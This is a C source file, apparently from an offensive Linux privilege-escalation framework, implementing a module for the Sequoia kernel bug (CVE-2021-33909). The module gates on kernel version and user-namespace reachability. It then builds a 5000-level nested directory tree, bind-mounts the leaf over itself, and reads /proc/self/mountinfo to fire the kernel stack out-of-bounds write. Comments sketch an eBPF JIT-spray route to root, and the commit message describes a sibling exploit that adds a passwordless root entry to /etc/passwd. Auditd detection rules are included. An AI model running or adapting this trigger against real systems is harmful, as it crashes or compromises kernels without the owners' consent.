Files
SKELETONKEY/modules/sequoia_cve_2021_33909/skeletonkey_modules.c
T
leviathan e13edd0cfd modules: add sudo_samedit + sequoia + sudoedit_editor + vmwgfx
sudo_samedit (CVE-2021-3156): Qualys Baron Samedit, userspace heap
    overflow in sudoedit -s. Version-range detect; Qualys-style trigger
    fork+verify (no per-distro offsets shipped — EXPLOIT_FAIL honest).
  sequoia (CVE-2021-33909): Qualys size_t→int wrap in seq_buf_alloc.
    Userns reach + 5000-level nested tree + bind-mount amplification +
    /proc/self/mountinfo read triggers stack-OOB write. No JIT-spray.
  sudoedit_editor (CVE-2023-22809): Synacktiv EDITOR/VISUAL '--' argv
    escape. Structural exploit — no offsets. Helper-via-sudoedit
    appends 'skel::0:0:' line to /etc/passwd, su to root.
  vmwgfx (CVE-2023-2008): DRM buffer-object OOB write in VMware guests.
    Detect requires DMI VMware + /dev/dri/cardN vmwgfx driver.

All four refuse cleanly on kctf-mgr (patched 6.12.86 / sudo 1.9.16p2).
2026-05-17 01:53:18 -04:00

727 lines
28 KiB
C

/*
* sequoia_cve_2021_33909 — SKELETONKEY module
*
* "Sequoia" (Qualys, July 2021): a size_t conversion bug in
* fs/seq_file.c::seq_buf_alloc(). show_mountinfo() passes a `size_t`
* total-output size to seq_buf_alloc(), but the internal accounting in
* seq_read_iter() uses a signed int for the running buffer offset.
* When the mountinfo string the kernel intends to render exceeds
* INT_MAX bytes (which is achievable by mounting a deeply-nested path
* — Qualys used ~1 MiB of '/' components), the int wraps NEGATIVE.
* That negative value then propagates into seq_buf_alloc() where it is
* implicitly cast to size_t (huge positive); kmalloc rejects the
* allocation, but a fallback path (`m->buf = vmalloc()` after kmalloc
* fails) ends up writing a small-but-nonzero number of bytes —
* specifically the bytes show_mountinfo wanted to render — at an
* offset that is OUT OF BOUNDS of the kernel stack buffer
* seq_read_iter held.
*
* Net effect: an unprivileged read(/proc/self/mountinfo) writes
* attacker-controlled bytes (the rendered mountinfo string for our
* deeply-nested bind mount) to a kernel-stack-adjacent location.
* Qualys's chain converted this into LPE by spraying eBPF JIT'd
* programs (one of two known weaponisations; userfaultfd + FUSE
* shadow-mount is the other) so the OOB write lands inside an
* executable JIT page → controlled RIP → ROP → cred swap.
*
* Reference: https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
*
* Discovered by Qualys (Bharat Jogi et al.), July 2021. Famous for
* being the first widely-disclosed Linux LPE that turned a sub-page
* out-of-bounds write into reliable root via the eBPF-JIT-spray
* primitive — that technique has shown up in every "linux mm slab OOB
* → JIT spray" public PoC since.
*
* STATUS: 🟡 PRIMITIVE.
*
* detect() — version-range + userns reachability gate, refuses on
* patched / unreachable hosts. Mainline fix is commit
* 8cae8cd89f05 ("seq_file: disallow extremely large seq
* buffer allocations") landing in 5.13.4 / 5.10.52 /
* 5.4.134.
*
* exploit() — full unshare+userns+mountns reach, builds a ~5000-level
* nested directory tree under /tmp/skeletonkey-sequoia/,
* bind-mounts the deepest leaf back over itself to
* amplify the mountinfo string length, chdir's into the
* leaf, and then open+read /proc/self/mountinfo to fire
* the bug. Witnesses (mountinfo byte count, dmesg
* best-effort) are written to /tmp/skeletonkey-sequoia.log.
* We do NOT attempt the eBPF-JIT-spray weaponisation —
* that is a substantial subsystem (sock_filter program
* build + BPF_PROG_LOAD + JIT layout reasoning + per-
* kernel cred offsets) and would be fabricated on any
* kernel we have not empirically tested.
*
* --full-chain — STUB. Prints the offset-help message and returns
* EXPLOIT_FAIL. The continuation roadmap is spelled out
* at the bottom of exploit() so the reader can see
* exactly what's missing.
*
* On a *vulnerable* host this module reliably triggers the OOB
* write. On a *patched* host (which is every distro shipping
* ≥5.13.4 / ≥5.10.52 / ≥5.4.134) detect() refuses and exploit()
* returns SKELETONKEY_OK without entering the userns.
*
* Affected: kernel-since-forever (the int-vs-size_t bug has been
* present since the seq_file rewrite c. 2.6.x; Qualys reports it
* exploitable on every distro they checked back to 2014).
* Mainline fix: 8cae8cd89f05 (Jul 20 2021) — lands in 5.13.4
* 5.13.x : K >= 5.13.4
* 5.10.x : K >= 5.10.52
* 5.4.x : K >= 5.4.134
*
* Preconditions:
* - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside
* userns for the bind-mount; the deeply-nested mkdir itself doesn't
* need privileges, but the amplification mount does)
* - ~1 MiB of cumulative path length under /tmp (≈5000 levels at
* 200-char component name — well within tmpfs default inode budget)
* - /proc/self/mountinfo readable (it is, on everything we target)
*
* Coverage rationale: 2021 fs/seq_file-class bug. Different family
* than our netfilter-heavy and mm-heavy modules — broadens the corpus
* shape. Important historical primitive (eBPF JIT spray adopted from
* Sequoia chain into many later exploits).
*/
#include "skeletonkey_modules.h"
#include "../../core/registry.h"
#include "../../core/kernel_range.h"
#include "../../core/offsets.h"
#include "../../core/finisher.h"
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <stdbool.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/stat.h>
#ifdef __linux__
# include <sched.h>
# include <sys/mount.h>
# include <sys/syscall.h>
# include <linux/sched.h>
#endif
/* macOS clangd lacks the Linux mount/syscall headers — guard fallbacks. */
#ifndef CLONE_NEWUSER
#define CLONE_NEWUSER 0x10000000
#endif
#ifndef CLONE_NEWNS
#define CLONE_NEWNS 0x00020000
#endif
#ifndef MS_BIND
#define MS_BIND 0x1000
#endif
/* --- kernel-range table -------------------------------------------- */
static const struct kernel_patched_from sequoia_patched_branches[] = {
{5, 4, 134},
{5, 10, 52},
{5, 13, 4},
{5, 14, 0}, /* mainline */
};
static const struct kernel_range sequoia_range = {
.patched_from = sequoia_patched_branches,
.n_patched_from = sizeof(sequoia_patched_branches) /
sizeof(sequoia_patched_branches[0]),
};
/* --- tunables ------------------------------------------------------- */
/*
* Qualys's PoC uses ~1 million bytes of path. With a 256-byte component
* name we need ~4096 levels; with 200 we need ~5120. We pick 5000 / 200
* which gives a generous margin and stays well under tmpfs's inode
* default cap on modern distros.
*
* The component name is intentionally an A-fill; the kernel renders it
* verbatim into mountinfo so this is what propagates into the OOB
* write. (For the JIT-spray weaponisation the bytes would be a crafted
* stub; we're not doing that here — we just want to drive the buggy
* size_t cast.)
*/
#define SEQ_BASE_DIR "/tmp/skeletonkey-sequoia"
#define SEQ_NESTED_LEVELS 5000
#define SEQ_COMPONENT_LEN 200 /* chars per directory component */
#define SEQ_LOG_PATH "/tmp/skeletonkey-sequoia.log"
/* --- userns reach helpers ------------------------------------------- */
static bool write_file(const char *path, const char *s)
{
int fd = open(path, O_WRONLY);
if (fd < 0) return false;
ssize_t n = write(fd, s, strlen(s));
close(fd);
return n == (ssize_t)strlen(s);
}
/* Probe: can this user unshare(CLONE_NEWUSER|CLONE_NEWNS) and get
* CAP_SYS_ADMIN-in-userns? We need this for the bind-mount step. The
* deeply-nested mkdir works without it, but the trigger needs the
* extra mountinfo entry to push the rendered string past INT_MAX. */
static int can_unshare_userns_mount(void)
{
pid_t pid = fork();
if (pid < 0) return -1;
if (pid == 0) {
#ifdef __linux__
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) == 0) _exit(0);
#endif
_exit(1);
}
int status = 0;
waitpid(pid, &status, 0);
return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
#ifdef __linux__
static bool enter_userns_root(void)
{
uid_t uid = getuid();
gid_t gid = getgid();
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
perror("unshare(NEWUSER|NEWNS)");
return false;
}
/* setgroups=deny is required before gid_map without CAP_SETGID. */
if (!write_file("/proc/self/setgroups", "deny")) {
/* Some kernels (pre-3.19) don't have setgroups proc file. */
}
char map[64];
snprintf(map, sizeof map, "0 %u 1\n", uid);
if (!write_file("/proc/self/uid_map", map)) {
perror("write uid_map"); return false;
}
snprintf(map, sizeof map, "0 %u 1\n", gid);
if (!write_file("/proc/self/gid_map", map)) {
perror("write gid_map"); return false;
}
return true;
}
#endif
/* --- detect -------------------------------------------------------- */
static skeletonkey_result_t sequoia_detect(const struct skeletonkey_ctx *ctx)
{
struct kernel_version v;
if (!kernel_version_current(&v)) {
fprintf(stderr, "[!] sequoia: could not parse kernel version\n");
return SKELETONKEY_TEST_ERROR;
}
/* The bug predates every kernel we'd run on, so there's no
* "pre-introduction" cutoff; only patched-or-not matters. */
bool patched = kernel_range_is_patched(&sequoia_range, &v);
if (patched) {
if (!ctx->json) {
fprintf(stderr, "[+] sequoia: kernel %s is patched\n", v.release);
}
return SKELETONKEY_OK;
}
int userns_ok = can_unshare_userns_mount();
if (!ctx->json) {
fprintf(stderr, "[i] sequoia: kernel %s in vulnerable range\n", v.release);
fprintf(stderr, "[i] sequoia: user_ns+mount_ns clone (CAP_SYS_ADMIN gate): %s\n",
userns_ok == 1 ? "ALLOWED" :
userns_ok == 0 ? "DENIED" : "could not test");
}
if (userns_ok == 0) {
if (!ctx->json) {
fprintf(stderr, "[+] sequoia: user_ns denied → unprivileged "
"exploit unreachable via bind-mount path\n");
fprintf(stderr, "[i] sequoia: bug is still reachable to a "
"process with CAP_SYS_ADMIN — not us\n");
}
return SKELETONKEY_PRECOND_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[!] sequoia: VULNERABLE — kernel in range AND "
"userns+mountns reachable\n");
}
return SKELETONKEY_VULNERABLE;
}
/* --- nested mkdir tree --------------------------------------------- */
#ifdef __linux__
/*
* Build SEQ_NESTED_LEVELS deep nested directories under SEQ_BASE_DIR.
* Strategy: chdir() to the parent of each new component, then mkdir
* + chdir into the child. This avoids hitting PATH_MAX in mkdir's
* argument (PATH_MAX is 4096 on Linux; total path here is ~1 MB —
* the kernel resolves it segment-by-segment via chdir's dentry cache).
*
* Returns the file descriptor pointing at the LEAF directory (so the
* caller can fchdir() back to it after we drop privs / do other
* setup), or -1 on failure.
*
* On failure we leave whatever we managed to create behind for
* sequoia_cleanup() to mop up.
*/
static int build_nested_tree(int *out_levels_built)
{
*out_levels_built = 0;
/* Ensure base dir exists. We don't care if it already does. */
if (mkdir(SEQ_BASE_DIR, 0700) < 0 && errno != EEXIST) {
fprintf(stderr, "[-] sequoia: mkdir(%s): %s\n",
SEQ_BASE_DIR, strerror(errno));
return -1;
}
if (chdir(SEQ_BASE_DIR) < 0) {
fprintf(stderr, "[-] sequoia: chdir(%s): %s\n",
SEQ_BASE_DIR, strerror(errno));
return -1;
}
/* Component name: SEQ_COMPONENT_LEN bytes of 'A'. The leaf gets a
* recognisable terminator so we can spot our mount in mountinfo. */
char comp[SEQ_COMPONENT_LEN + 1];
memset(comp, 'A', SEQ_COMPONENT_LEN);
comp[SEQ_COMPONENT_LEN] = '\0';
int built = 0;
for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
if (mkdir(comp, 0700) < 0 && errno != EEXIST) {
fprintf(stderr, "[-] sequoia: mkdir level %d: %s\n",
i, strerror(errno));
*out_levels_built = built;
return -1;
}
if (chdir(comp) < 0) {
fprintf(stderr, "[-] sequoia: chdir level %d: %s\n",
i, strerror(errno));
*out_levels_built = built;
return -1;
}
built++;
}
*out_levels_built = built;
/* Open the leaf so the caller can fchdir back here. */
int fd = open(".", O_RDONLY | O_DIRECTORY);
if (fd < 0) {
fprintf(stderr, "[-] sequoia: open(leaf): %s\n", strerror(errno));
return -1;
}
return fd;
}
/* Bind-mount the leaf onto itself. This creates a new entry in
* /proc/self/mountinfo whose path field renders the FULL deeply-
* nested path — pushing the total mountinfo string length past the
* int-cast boundary. Without the bind mount, mountinfo only lists
* the original /tmp mount (a short string).
*
* Requires CAP_SYS_ADMIN-in-userns (which enter_userns_root gave us). */
static bool bind_mount_leaf(void)
{
if (mount(".", ".", NULL, MS_BIND, NULL) < 0) {
fprintf(stderr, "[-] sequoia: bind-mount(.,.): %s\n", strerror(errno));
return false;
}
return true;
}
/* Read /proc/self/mountinfo fully, count bytes. Best-effort: returns
* the total byte count, or -1 on open failure. On a VULNERABLE kernel
* this read triggers the OOB write inside the kernel. On a patched
* kernel the kernel returns -ENOMEM (the new safety check rejects
* over-large seq_buf allocations). */
static ssize_t read_mountinfo_and_count(void)
{
int fd = open("/proc/self/mountinfo", O_RDONLY);
if (fd < 0) return -1;
ssize_t total = 0;
char buf[8192];
for (;;) {
ssize_t n = read(fd, buf, sizeof buf);
if (n < 0) {
if (errno == EINTR) continue;
/* On a patched kernel, the read may fail with ENOMEM
* after our crafted mountinfo entry triggers the safety
* check. We record the errno via caller's errno read. */
close(fd);
return -1;
}
if (n == 0) break;
total += n;
}
close(fd);
return total;
}
/* Best-effort dmesg sample: open /dev/kmsg and read up to N bytes.
* On most distros this is root-only, so we just gracefully fail and
* note that in the log. */
static void log_dmesg_tail(FILE *log)
{
int fd = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
if (fd < 0) {
fprintf(log, " dmesg_sample: <not readable: %s>\n", strerror(errno));
return;
}
char buf[2048];
ssize_t n = read(fd, buf, sizeof buf - 1);
close(fd);
if (n <= 0) {
fprintf(log, " dmesg_sample: <no data: %s>\n",
n < 0 ? strerror(errno) : "empty");
return;
}
buf[n] = '\0';
/* Scan for SEQUOIA-relevant warning shapes; we don't need the
* exact match, just record whether anything 'oops/BUG/KASAN'-ish
* showed up in the first kmsg page. */
bool oops = strstr(buf, "BUG:") != NULL ||
strstr(buf, "Oops") != NULL ||
strstr(buf, "KASAN") != NULL ||
strstr(buf, "general protection fault") != NULL;
fprintf(log, " dmesg_sample_bytes: %zd\n", n);
fprintf(log, " dmesg_oops_marker: %s\n", oops ? "yes" : "no");
}
#endif /* __linux__ */
/* --- exploit ------------------------------------------------------- */
#ifdef __linux__
static skeletonkey_result_t sequoia_exploit_linux(const struct skeletonkey_ctx *ctx)
{
/* (R0) refuse without --i-know. */
if (!ctx->authorized) {
fprintf(stderr, "[-] sequoia: refusing to run exploit without --i-know\n");
return SKELETONKEY_PRECOND_FAIL;
}
/* (R1) refuse if already root. */
if (geteuid() == 0) {
if (!ctx->json) {
fprintf(stderr, "[i] sequoia: already root — nothing to escalate\n");
}
return SKELETONKEY_OK;
}
/* (R2) re-call detect — refuse if not vulnerable. */
skeletonkey_result_t pre = sequoia_detect(ctx);
if (pre == SKELETONKEY_OK) {
fprintf(stderr, "[+] sequoia: kernel not vulnerable; refusing exploit\n");
return SKELETONKEY_OK;
}
if (pre != SKELETONKEY_VULNERABLE) {
fprintf(stderr, "[-] sequoia: detect() says not vulnerable; refusing\n");
return pre;
}
/* (R3) full-chain: STUB. The Sequoia chain to root needs an
* eBPF-JIT-spray subsystem we don't ship — printing the offset
* help and refusing is the honest answer. */
if (ctx->full_chain) {
struct skeletonkey_kernel_offsets off;
memset(&off, 0, sizeof off);
(void)skeletonkey_offsets_resolve(&off);
skeletonkey_offsets_print(&off);
skeletonkey_finisher_print_offset_help("sequoia");
fprintf(stderr,
"[-] sequoia: --full-chain not implemented.\n"
" The Qualys chain converts the stack-OOB write to RIP\n"
" control via eBPF JIT spray: load many sock_filter\n"
" programs, induce the JIT to lay them out at predictable\n"
" kernel-VA pages, then steer the OOB write to overwrite\n"
" the JIT prologue of one program with attacker shellcode\n"
" (cred swap + return). Building that here would mean a\n"
" standalone BPF_PROG_LOAD harness + JIT page-layout\n"
" reasoning + per-kernel cred offsets — a substantial\n"
" subsystem we have not validated empirically.\n"
" See Qualys advisory section 3.1 (eBPF technique) for\n"
" the reference implementation.\n");
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: entering userns + mountns\n");
}
/* Fork: keep the deeply-nested mkdir + bind-mount + read confined
* to a child process. The parent can then clean up regardless of
* how the child terminates. */
pid_t child = fork();
if (child < 0) { perror("fork"); return SKELETONKEY_TEST_ERROR; }
if (child == 0) {
/* (R4) unshare for userns+mount_ns → CAP_SYS_ADMIN-in-userns. */
if (!enter_userns_root()) {
_exit(20);
}
/* (R5) Build the deeply-nested directory tree. */
int levels_built = 0;
int leaf_fd = build_nested_tree(&levels_built);
if (leaf_fd < 0) {
fprintf(stderr, "[-] sequoia: nested tree build failed at level %d\n",
levels_built);
_exit(21);
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: built %d-level nested tree under %s\n",
levels_built, SEQ_BASE_DIR);
}
/* (R6) Bind-mount the leaf back over itself. This is what
* pushes the rendered mountinfo string past INT_MAX. */
if (!bind_mount_leaf()) {
fprintf(stderr, "[-] sequoia: bind-mount failed; cannot amplify "
"mountinfo length\n");
close(leaf_fd);
_exit(22);
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: bind-mount leaf-over-leaf armed\n");
}
/* (R7) chdir back to leaf (we may have changed dirs during
* tree build but we want to ensure mountinfo renders our
* mount point in full). */
if (fchdir(leaf_fd) < 0) {
fprintf(stderr, "[~] sequoia: fchdir(leaf): %s — continuing\n",
strerror(errno));
}
close(leaf_fd);
/* (R8) Trigger: read /proc/self/mountinfo. On a vulnerable
* kernel the int-vs-size_t bug fires inside seq_buf_alloc()
* and the kernel performs an OOB write of show_mountinfo's
* rendered bytes off the end of the seq_read_iter stack
* buffer. We have no in-process arb-write primitive that
* consumes those bytes (that's the eBPF-JIT-spray step
* we don't ship), so we just record the empirical
* witness: did the read succeed? what byte count? did
* dmesg cough up an oops marker? */
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: firing trigger — "
"read(/proc/self/mountinfo)\n");
}
errno = 0;
ssize_t mi_bytes = read_mountinfo_and_count();
int mi_errno = errno;
FILE *log = fopen(SEQ_LOG_PATH, "w");
if (log) {
fprintf(log,
"sequoia trigger:\n"
" nested_levels = %d\n"
" component_len = %d\n"
" total_path_bytes ~= %lld\n"
" bind_mount_armed = yes\n"
" mountinfo_read_bytes = %lld\n"
" mountinfo_read_errno = %d (%s)\n",
levels_built, SEQ_COMPONENT_LEN,
(long long)levels_built * SEQ_COMPONENT_LEN,
(long long)mi_bytes,
mi_errno, mi_errno ? strerror(mi_errno) : "ok");
log_dmesg_tail(log);
fprintf(log,
"Note: this run did NOT attempt the eBPF-JIT-spray\n"
"weaponisation. The OOB write fired inside the kernel\n"
"but we do not consume it to control RIP / swap creds.\n"
"See module .c for the continuation roadmap.\n");
fclose(log);
}
if (!ctx->json) {
fprintf(stderr,
"[*] sequoia: mountinfo read returned %lld bytes (errno=%d)\n",
(long long)mi_bytes, mi_errno);
fprintf(stderr,
"[*] sequoia: empirical witness logged to %s\n",
SEQ_LOG_PATH);
}
/* (R9) Continuation roadmap.
*
* TODO(weaponise-jit): spawn the eBPF JIT spray:
* - bpf(BPF_PROG_LOAD, SOCKET_FILTER, ...) many times with
* attacker-chosen byte patterns in the program body
* - the kernel JIT compiles each to a page-aligned executable
* region; bytes from the program body survive into the
* prologue at known offsets
* - tune SEQ_NESTED_LEVELS + SEQ_COMPONENT_LEN so the rendered
* mountinfo string lands the OOB write at the JIT page
* hosting one of our programs
* - the overwritten prologue performs: lookup current task →
* cred → uid=0 → return.
* - execute the (now-attacker-modified) program by attaching
* it to a socket and sending a packet → kernel runs cred
* swap → /bin/sh as root.
*
* None of this is implemented today. We exit 30 to flag
* "trigger ran cleanly, no escalation". */
_exit(30);
}
/* PARENT */
int status = 0;
pid_t w = waitpid(child, &status, 0);
if (w < 0) { perror("waitpid"); return SKELETONKEY_TEST_ERROR; }
if (WIFSIGNALED(status)) {
int sig = WTERMSIG(status);
if (!ctx->json) {
fprintf(stderr,
"[!] sequoia: exploit child killed by signal %d "
"(consistent with OOB write hitting an unmapped page)\n",
sig);
fprintf(stderr,
"[~] sequoia: empirical signal recorded; no cred-overwrite\n"
" primitive — NOT claiming EXPLOIT_OK.\n"
" See %s + dmesg for witnesses.\n", SEQ_LOG_PATH);
}
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!WIFEXITED(status)) {
fprintf(stderr, "[-] sequoia: child terminated abnormally (status=0x%x)\n",
status);
return SKELETONKEY_EXPLOIT_FAIL;
}
int rc = WEXITSTATUS(status);
if (rc == 20) return SKELETONKEY_TEST_ERROR; /* enter_userns failed */
if (rc == 21) return SKELETONKEY_PRECOND_FAIL; /* tree build failed */
if (rc == 22) return SKELETONKEY_EXPLOIT_FAIL; /* bind-mount refused */
if (rc != 30) {
fprintf(stderr, "[-] sequoia: child failed at stage rc=%d\n", rc);
return SKELETONKEY_EXPLOIT_FAIL;
}
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: trigger ran to completion.\n");
fprintf(stderr,
"[~] sequoia: stack-OOB write fired but JIT-spray weaponisation\n"
" NOT implemented (per-kernel offsets + BPF subsystem; see\n"
" module .c TODO blocks). Returning EXPLOIT_FAIL per\n"
" verified-vs-claimed.\n");
}
return SKELETONKEY_EXPLOIT_FAIL;
}
#endif /* __linux__ */
static skeletonkey_result_t sequoia_exploit(const struct skeletonkey_ctx *ctx)
{
#ifdef __linux__
return sequoia_exploit_linux(ctx);
#else
(void)ctx;
fprintf(stderr, "[-] sequoia: Linux-only module; cannot run on this host\n");
return SKELETONKEY_PRECOND_FAIL;
#endif
}
/* --- cleanup ------------------------------------------------------- */
/* Walk back down the nested tree, umounting then rmdir'ing each level.
* Best-effort: we don't bail on the first error because partial cleanup
* is still useful, and some levels may not have a mount on them (only
* the leaf gets bind-mounted in the canonical path). */
static skeletonkey_result_t sequoia_cleanup(const struct skeletonkey_ctx *ctx)
{
if (!ctx->json) {
fprintf(stderr, "[*] sequoia: cleaning up nested tree + bind mounts\n");
}
#ifdef __linux__
/* Try to enter SEQ_BASE_DIR; if it doesn't exist, nothing to do. */
int base_fd = open(SEQ_BASE_DIR, O_RDONLY | O_DIRECTORY);
if (base_fd < 0) {
/* Nothing to clean up — module never ran or already cleaned. */
goto log_cleanup;
}
close(base_fd);
/* Walk to the leaf via chdir, then rmdir as we walk back out. We
* don't know how far we got, so we try the full depth and ignore
* ENOENT. The component name is the same at every level. */
char comp[SEQ_COMPONENT_LEN + 1];
memset(comp, 'A', SEQ_COMPONENT_LEN);
comp[SEQ_COMPONENT_LEN] = '\0';
if (chdir(SEQ_BASE_DIR) < 0) goto log_cleanup;
int depth = 0;
for (int i = 0; i < SEQ_NESTED_LEVELS; i++) {
if (chdir(comp) < 0) break;
depth++;
}
/* Best-effort: umount the leaf (we may have bind-mounted it). */
(void)umount2(".", MNT_DETACH);
/* Walk back out, rmdir-ing each level. */
for (int i = 0; i < depth; i++) {
if (chdir("..") < 0) break;
if (rmdir(comp) < 0 && errno != ENOENT && errno != EBUSY) {
/* Likely had a mount on it; try MNT_DETACH then rmdir. */
(void)umount2(comp, MNT_DETACH);
(void)rmdir(comp);
}
}
(void)chdir("/");
(void)rmdir(SEQ_BASE_DIR);
#endif /* __linux__ */
log_cleanup:
if (unlink(SEQ_LOG_PATH) < 0 && errno != ENOENT) {
/* harmless */
}
return SKELETONKEY_OK;
}
/* --- detection rules ----------------------------------------------- */
static const char sequoia_auditd[] =
"# Sequoia (CVE-2021-33909) — auditd detection rules\n"
"# Trigger shape: mount(2) on /proc namespaces from a userns +\n"
"# many many mkdir(2) calls in a tight loop with identical long\n"
"# component names. Each individual call is benign — flag the\n"
"# *combination*. The deeply-nested mkdir pattern is the strongest\n"
"# signal: legitimate workloads don't recurse 5000 levels.\n"
"-a always,exit -F arch=b64 -S unshare -k skeletonkey-sequoia-userns\n"
"-a always,exit -F arch=b64 -S mount -k skeletonkey-sequoia-mount\n"
"-a always,exit -F arch=b64 -S mkdir -F success=1 -k skeletonkey-sequoia-mkdir\n"
"-a always,exit -F arch=b64 -S mkdirat -F success=1 -k skeletonkey-sequoia-mkdir\n"
"# Correlation hint: a process producing >1000 mkdir-key events\n"
"# within 5s AND a subsequent skeletonkey-sequoia-mount event is\n"
"# the canonical trigger shape.\n";
const struct skeletonkey_module sequoia_module = {
.name = "sequoia",
.cve = "CVE-2021-33909",
.summary = "seq_file size_t overflow → kernel stack OOB write (Qualys Sequoia) — primitive only",
.family = "filesystem",
.kernel_range = "K < 5.13.4 / 5.10.52 / 5.4.134",
.detect = sequoia_detect,
.exploit = sequoia_exploit,
.mitigate = NULL,
.cleanup = sequoia_cleanup,
.detect_auditd = sequoia_auditd,
.detect_sigma = NULL,
.detect_yara = NULL,
.detect_falco = NULL,
};
void skeletonkey_register_sequoia(void)
{
skeletonkey_register(&sequoia_module);
}